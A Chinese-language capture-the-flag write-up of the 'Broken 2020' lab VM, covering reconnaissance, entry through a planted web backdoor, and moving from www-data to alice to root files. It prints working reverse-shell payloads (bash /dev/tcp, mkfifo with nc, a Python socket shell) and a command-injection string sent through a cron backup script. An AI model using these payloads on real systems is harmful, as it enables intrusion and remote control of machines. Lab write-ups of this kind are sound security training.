broken_2020 靶机

信息收集

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.1.232     

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:D3:A9:03 (Oracle VirtualBox virtual NIC)

开放了 22 和 80 端口

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.168.1.232    

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 7e:f3:33:8c:be:0c:ed:d7:0e:c6:67:cc:73:bf:c0:ab (RSA)
|   256 ee:ed:74:02:0d:3f:7d:6d:45:aa:ff:f3:3a:d0:1a:d9 (ECDSA)
|_  256 d1:18:a9:ef:7f:b6:c8:a9:30:52:c8:e6:b6:ec:64:80 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Coming Soon
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:D3:A9:03 (Oracle VirtualBox virtual NIC)

Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Debian 操作系统

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80 192.168.1.232

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.1.1
| http-enum: 
|_  /images/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
MAC Address: 08:00:27:D3:A9:03 (Oracle VirtualBox virtual NIC)

目录爆破

/images/ 目录，先来目录爆破吧

┌──(kali㉿kali)-[~/Documents/Broken_2020]
└─$ sudo dirsearch -u http://192.168.1.232       

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

[10:23:58] 301 -  312B  - /cms  ->  http://192.168.1.232/cms/               
[10:23:58] 200 -  438B  - /cms/                                             
[10:24:02] 301 -  314B  - /fonts  ->  http://192.168.1.232/fonts/           
[10:24:04] 200 -    3KB - /images/                                          
[10:24:04] 301 -  315B  - /images  ->  http://192.168.1.232/images/
[10:24:04] 200 -    1KB - /index.html                                       
[10:24:15] 403 -  278B  - /server-status/                                   
[10:24:15] 403 -  278B  - /server-status

网页默认界面是提示新的 cms 正在准备中，网页源码中没隐藏信息

cms进入后是个安装界面点击安装跳转到 http://192.168.1.232/cms/?install=off

似乎是第一个 flag，但是安装界面再也回不去了

原本想试试换个更大的字典爆破，但是可能是爆破频率上去后靶机的响应就会有问题，所以只好暂时放弃

之后我对图片进行了查看，尝试发掘其中是否有隐写，font.jpg 倒是可能有 steghide 隐写，但是使用 stegseek 爆破不出口令

这里卡了一会，主要是在判断图片是否有信息隐藏，然后尝试对 cms 目录进行爆破

┌──(kali㉿kali)-[~/Documents/Broken_2020]
└─$ sudo dirsearch -u 192.168.1.232/cms/ 

[22:40:32] 301 -  315B  - /cms/cc  ->  http://192.168.1.232/cms/cc/         
[22:40:38] 200 -   67B  - /cms/index.html

网站后门反弹 shell

发现了一个隐藏目录 cc，进去查看，好像是别人留的后门

先使用 nc 开启监听试试

┌──(kali㉿kali)-[~/Documents/Broken_2020]
└─$ sudo nc -lvnp 443                   
listening on [any] 443 ...
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.232] 41466
GET /39b14733d3eb56a24f928abf52e115b4.sh HTTP/1.0
Host: 192.168.1.101:443
Connection: close

是在请求一个文件 39b14733d3eb56a24f928abf52e115b4.sh

我们先自己创建个包含反弹 shell 的同名文件，再用 python 开启个 web 服务

┌──(kali㉿kali)-[~/Documents/Broken_2020]
└─$ echo '/bin/bash -i >& /dev/tcp/192.168.1.101/443 0>&1' > 39b14733d3eb56a24f928abf52e115b4.sh

┌──(kali㉿kali)-[~/Documents/Broken_2020]
└─$ python -m http.server 8088

提前开启监听然后访问以下链接，从而反弹 shell 192.168.1.232/cms/cc/?ip=192.168.1.101&port=8088

┌──(kali㉿kali)-[~/Documents/Broken_2020]
└─$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.232] 41480
bash: cannot set terminal process group (535): Inappropriate ioctl for device
bash: no job control in this shell
www-data@broken:/var/www/html/cms/cc$ whoami
whoami
www-data
www-data@broken:/var/www/html/cms/cc$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@broken:/var/www/html/cms/cc$ uname -a
uname -a
Linux broken 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
www-data@broken:/var/www/html$ which python
which python
/usr/bin/python
www-data@broken:/var/www/html$ python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"
www-data@broken:/var/www/html$ sudo -l
sudo -l
[sudo] password for www-data:

用户移动

反弹 shell 成功，看看敏感文件权限

www-data@broken:/var/www/html$ ls -liah /etc/passwd /etc/shadow   
ls -liah /etc/passwd /etc/shadow 
269342 -rw-r--r-- 1 root root   1.6K Mar 24  2020 /etc/passwd
269646 -rw-r----- 1 root shadow 1.1K Mar 26  2020 /etc/shadow

查看网站目录

www-data@broken:/var/www/html/cms/cc$ ls -liha
ls -liha
total 28K
7030 drwxr-xr-x 2 www-data www-data 4.0K Oct 16 04:48 .
 437 drwxr-xr-x 3 www-data www-data 4.0K Oct 15 16:37 ..
6671 -rw-r--r-- 1 www-data www-data   32 Oct 15 16:37 e425ef56a6ca4a3101e775d5019fb237.txt
  39 -rw-r--r-- 1 www-data www-data  164 Mar 24  2020 fe8b7cfd24a4ad396054c8cd2f44d296.py
7384 -rw-r--r-- 1 www-data www-data  992 Mar 24  2020 index.php
8655 -rw-r--r-- 1 www-data www-data   54 Oct 16 04:51 log.txt
8654 -rw-r--r-- 1 www-data www-data   82 Oct 16 04:51 shell.sh

我们应该就是通过 shell.sh 后门进来的，看一眼 python 文件

www-data@broken:/var/www/html/cms/cc$ cat fe8b7cfd24a4ad396054c8cd2f44d296.py
cat fe8b7cfd24a4ad396054c8cd2f44d296.py
import requests
import os

file = open("e425ef56a6ca4a3101e775d5019fb237.txt", "r")
script=file.read()
file.close()


ip="test"
url="http://"+ip+"/"+script+".sh"

python 文件读取 txt 中的文件中的信息

www-data@broken:/var/www/html/cms/cc$ cat e425ef56a6ca4a3101e775d5019fb237.txt
<ml/cms/cc$ cat e425ef56a6ca4a3101e775d5019fb237.txt
39b14733d3eb56a24f928abf52e115b4
www-data@broken:/var/www/html/cms/cc$ cat shell.sh
cat shell.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.1.101 443 >/tmp/f

txt 文件中保存着请求文件的名字，请求此文件，并将其写入 shell.sh 并运行。逻辑理清楚了，不过对提权没帮助，看看用户家目录

www-data@broken:/home/alice$ ls -liha
ls -liha
total 48K
  31 drwxr-xr-x 5 alice alice 4.0K Mar 26  2020 .
 193 drwxr-xr-x 3 root  root  4.0K Mar 24  2020 ..
6538 lrwxrwxrwx 1 alice alice    9 Mar 24  2020 .bash_history -> /dev/null
  67 -rw-r--r-x 1 alice alice  220 Mar 24  2020 .bash_logout
7046 -rw-r--r-- 1 alice alice  570 Jan 31  2010 .bashrc
6523 drwxr-xr-x 3 alice alice 4.0K Mar 24  2020 .cache
6842 drwxr-xr-x 3 alice alice 4.0K Mar 24  2020 .local
  46 -rw-r--r-- 1 alice alice  148 Aug 17  2015 .profile
  54 -rw-r--r-- 1 alice alice   66 Mar 25  2020 .selected_editor
6982 -rw-r--r-- 1 alice alice  173 Mar 24  2020 .wget-hsts
7131 -rw-r--r-- 1 alice alice   29 Mar 25  2020 flag.txt
6841 -rw-r--r-- 1 alice alice  141 Mar 25  2020 note.txt
6859 drwxrwxrwx 2 alice alice 4.0K Mar 26  2020 script

先把 flag 和 note 拿了

www-data@broken:/home/alice$ cat note.txt
cat note.txt
Alice, 

Please do not install TrustMeCMS, I need check the source before

PS: I created a script to clear apache log during the tests

root
www-data@broken:/home/alice$ cat flag.txt
cat flag.txt
{FLAG2:**Robing the rober**}

root 写了个定时清除 apach 日志的脚本，还有个 script 目录看看

www-data@broken:/home/alice/script$ ls -liha
ls -liha
total 16K
6859 drwxrwxrwx 2 alice alice 4.0K Mar 26  2020 .
  31 drwxr-xr-x 5 alice alice 4.0K Mar 26  2020 ..
6862 -rw-r--r-x 1 alice alice   48 Oct 16 04:57 clear.log
6861 -rwxr--r-- 1 alice alice  585 Mar 25  2020 log.py
www-data@broken:/home/alice/script$ cat log.py
cat log.py
#!/usr/bin/python2.7
import requests
import os
import datetime

"""
#Juste in case I want stop this script remotly

r = requests.get("https://pastebin.com/raw/9vzu2CA5")

cmd=str(r.text)
check ="stopit"
if check == cmd :
        os.system('cp /home/alice/script/log.py /home/alice/script/log.bak')

"""


path="/var/log/apache2"
dir = os.listdir(path)
date = str(datetime.datetime.now())
for logfile in dir :
        clear = open(path+"/"+logfile, "w")
        clear.truncate(0)
        clear.close()
logfile = open("/home/alice/script/clear.log","w")
logfile.write("last clear apache log "+date)
logfile.close()

清除日志的文件就是 clear.log，不过由于此文件我们没有更改权限，虽然这个目录是 777 权限

继续信息收集，在根目录下发现了 backup.py 和 back 文件夹

www-data@broken:/back$ ls ..
ls ..
back       etc             lib         media  run   usr
backup.py  flag.txt        lib32       mnt    sbin  var
bin        home            lib64       opt    srv   vmlinuz
boot       initrd.img      libx32      proc   sys   vmlinuz.old
dev        initrd.img.old  lost+found  root   tmp
www-data@broken:/$ cat backup.py
cat backup.py
import os
import datetime
size = os.path.getsize("/home/alice/backup/path.txt")

if size > 3 :

        file = open("/home/alice/backup/path.txt", "r")
        path = file.read().strip()
        file.close()
        cmd = "rsync -a "+path+" /home/alice/backup --exclude back --exclude backup.py&& chown -R www-data:alice /home/alice/backup && chmod -R 777 /home/alice/backup"
        os.system(cmd)
date = str(datetime.datetime.now())
log = open("/home/alice/backup/logbot.log", "w")
log.write("last check : "+date)
log.close()

backup.py 文件主要是对 /home/alice/backup/path.txt 中的路径进行同步备份，并且将备份后的用户权限设置为了一般用户可读。

www-data@broken:/back$ ls -liha
ls -liha
total 36K
152663 drwxr-xr-x  3 root root 4.0K Mar 25  2020 .
     2 drwxr-xr-x 19 root root 4.0K Mar 25  2020 ..
152665 drwxr-xr-x  2 root root 4.0K Mar 25  2020 backup
152673 -rwxr-xr-x  1 root root  493 Mar 25  2020 backup.py
152670 -rw-r--r--  1 root root  114 Mar 25  2020 check.py
152671 -rwxr-xr-x  1 root root  274 Mar 25  2020 hack.sh
152674 -rwxr-xr-x  1 root root  132 Mar 25  2020 load.sh
152664 -rw-------  1 root root 1.2K Mar 25  2020 post
152672 -rw-------  1 root root 1.2K Mar 25  2020 root

各文件内容如下

但是核心点还是 alice 用户目录下的 backup 文件夹，目前还是没法实现用户切换或者提权

这里忽略了一点，卡了很久，文件虽然是可读不可写，但是目录权限是 777 ，这意味着我们可以更改文件名，文件名并不是由文件权限所限制的

www-data@broken:/home/alice/script$ mv log.py log.py.bak
mv log.py log.py.bak
www-data@broken:/home/alice/script$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.101",444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' > log.py

提权

提前开启监听，等待反弹 shell

┌──(kali㉿kali)-[~/Documents/Broken_2020]
└─$ sudo nc -lvnp 444        
[sudo] password for kali: 
listening on [any] 444 ...
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.232] 58756
alice@broken:/root$ whoami
whoami
alice
alice@broken:/root$ id
id
uid=1000(alice) gid=1000(alice) groupes=1000(alice),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
alice@broken:/root$ cd ~
cd ~
alice@broken:~$ ls -liah
ls -liah
total 52K
  31 drwxr-xr-x 6 alice alice 4,0K oct.  16 10:25 .
 193 drwxr-xr-x 3 root  root  4,0K mars  24  2020 ..
7147 drwx------ 2 alice alice 4,0K mars  26  2020 backup
6538 lrwxrwxrwx 1 alice alice    9 mars  24  2020 .bash_history -> /dev/null
  67 -rw-r--r-x 1 alice alice  220 mars  24  2020 .bash_logout
7046 -rw-r--r-- 1 alice alice  570 janv. 31  2010 .bashrc
6523 drwxr-xr-x 3 alice alice 4,0K mars  24  2020 .cache
7131 -rw-r--r-- 1 alice alice   29 mars  25  2020 flag.txt
6842 drwxr-xr-x 3 alice alice 4,0K mars  24  2020 .local
6841 -rw-r--r-- 1 alice alice  141 mars  25  2020 note.txt
  46 -rw-r--r-- 1 alice alice  148 août  17  2015 .profile
6859 drwxrwxrwx 2 alice alice 4,0K oct.  16 10:24 script
  54 -rw-r--r-- 1 alice alice   66 mars  25  2020 .selected_editor
6982 -rw-r--r-- 1 alice alice  173 mars  24  2020 .wget-hsts

发现在 alice 用户权限下，文件夹中多了 backup 文件夹，进入

alice@broken:~/backup$ ls -liah
ls -liah
total 20K
7147 drwx------ 2 alice alice 4,0K mars  26  2020 .
  31 drwxr-xr-x 6 alice alice 4,0K oct.  16 10:25 ..
9698 -rw-r--r-- 1 alice alice   27 mars  26  2020 flag.txt
9697 -rw-r--r-- 1 alice alice  150 oct.  16 10:28 logbot.log
9696 -rw-r--r-- 1 alice alice  129 mars  26  2020 note.txt
9695 -rw-r--r-- 1 alice alice    0 mars  26  2020 path.txt

接下来我尝试了直接写入文件名，但是 logbot.log 提示必须是文件夹，因为我们之前以及看到了定时执行的 backup.py 的内容，其中 path.txt 中的内容是完全可控的，且没有过滤就直接执行了，考虑是否可以在此直接反弹提权

alice@broken:~/backup$ echo '/etc/shadow /home/alice/backup &&nc 192.168.1.101 445 -e /bin/bash &&rsync -a' >path.txt

alice@broken:~/backup$ cat logbot.log
cat logbot.log
[INFO] 10:26:01 16/10/2023  : no path in path.txt
[SECURITY] 10:39:01 16/10/2023  :  [&] may be an attack attempt. To avoid this the script was interrupted

竟然还有检测 & 这是我没想到的，如果想获取 shadow 文件，只能把 etc 目录整个备份下来，感觉不太行

关于如何利用此处的可控输入提权，卡了很久。尝试先拿 /root 目录下的内容看看

alice@broken:~/backup$ echo "/root" >path.txt
echo "/root" >path.txt
alice@broken:~/backup$ cd root
cd root
alice@broken:~/backup/root$ ls -liah
ls -liah
total 40K
7172 drwxrwxrwx 4 www-data alice 4,0K oct.  16 10:25 .
7147 drwxrwxrwx 3 www-data alice 4,0K oct.  16 10:46 ..
8708 lrwxrwxrwx 1 www-data alice    9 mars  24  2020 .bash_history -> /dev/null
8845 -rwxrwxrwx 1 www-data alice  570 janv. 31  2010 .bashrc
8728 drwxrwxrwx 3 www-data alice 4,0K mars  24  2020 .cache
8852 -rwxrwxrwx 1 www-data alice  508 mars  26  2020 flag.txt
8730 drwxrwxrwx 3 www-data alice 4,0K mars  24  2020 .local
8854 -rwxrwxrwx 1 www-data alice    0 mars  26  2020 log.txt
8846 -rwxrwxrwx 1 www-data alice  148 août  17  2015 .profile
8848 -rwxrwxrwx 1 www-data alice   66 mars  25  2020 .selected_editor
8856 -rwxrwxrwx 1 www-data alice  105 mars  26  2020 test.py
8850 -rwxrwxrwx 1 www-data alice  173 mars  24  2020 .wget-hsts
alice@broken:~/backup/root$ cat flag.txt
cat flag.txt
Congratulation for the root flag !

     _________
    / ======= \
   / __________\
  | ___________ |
  | | -root-  | |
  | |         | |
  | |_________| |_____________________________________________________________________
  \=____________/                     enjoyed this VM ?                               )
  / """"""""""" \                     I love bitcoin                                 /
 / ::::::::::::: \           1Ba6vFEamUenzrXr4scGQ8QLya7t7zYZ1S                  =D-'
(_________________)

但还是没提权啊，找了两篇博客看了看，发现似乎这里直接拿 flag 就行。emmmm

总结

对于文件系统权限的理解还不太行，只盯着只读文件了，导致反弹 shell 过于费劲